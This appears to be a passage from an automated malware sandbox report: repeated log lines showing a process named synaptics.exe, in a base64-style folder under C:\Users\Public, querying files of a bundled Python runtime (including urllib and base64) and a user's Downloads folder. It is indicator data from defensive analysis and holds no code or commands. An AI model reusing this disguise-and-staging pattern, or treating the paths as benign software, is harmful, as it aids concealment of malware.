            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\cp1252.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\cp1252.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\cp1252.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\cp1252.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\cp1252.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__pycache__\cp1252.cpython-310.pyc.27153248 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\io.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\io.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\io.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\io.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\io.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\io.cpython-310.pyc.27189456 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\abc.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\abc.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\abc.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\abc.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\abc.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\abc.cpython-310.pyc.26393920 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\site.cpython-310.pyc.27160992 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\os.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\os.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\os.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\os.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\os.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\os.cpython-310.pyc.27197648 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\stat.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\stat.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\stat.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\stat.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\stat.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\stat.cpython-310.pyc.27161088 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\_collections_abc.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\_collections_abc.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\_collections_abc.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\_collections_abc.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\_collections_abc.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\_collections_abc.cpython-310.pyc.27549272 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\ntpath.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\ntpath.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\ntpath.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\ntpath.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\ntpath.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\ntpath.cpython-310.pyc.27162432 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\genericpath.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\genericpath.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\genericpath.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\genericpath.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\genericpath.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\genericpath.cpython-310.pyc.27339960 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\_sitebuiltins.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\_sitebuiltins.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\_sitebuiltins.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\_sitebuiltins.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\_sitebuiltins.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\_sitebuiltins.cpython-310.pyc.27556632 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\distutils-precedence.pth VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\_distutils_hack VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc.27459744 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pywin32.pth VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pythonwin VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc.27459744 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pywin32_system32 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pythonwin VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pythonwin VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pythonwin VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pywin32_system32 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pythonwin VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\__pycache__\__init__.cpython-310.pyc.27425976 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\request.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\request.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\request.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\request.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\request.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\urllib\__pycache__\request.cpython-310.pyc.27426392 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\base64.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\base64.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\base64.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\base64.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\base64.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\base64.cpython-310.pyc.37181920 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\re.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\re.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\re.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\re.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\re.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\re.cpython-310.pyc.37105960 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\enum.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\enum.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\enum.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\enum.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\enum.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\enum.cpython-310.pyc.37182304 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\types.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\types.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\types.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\types.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\types.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
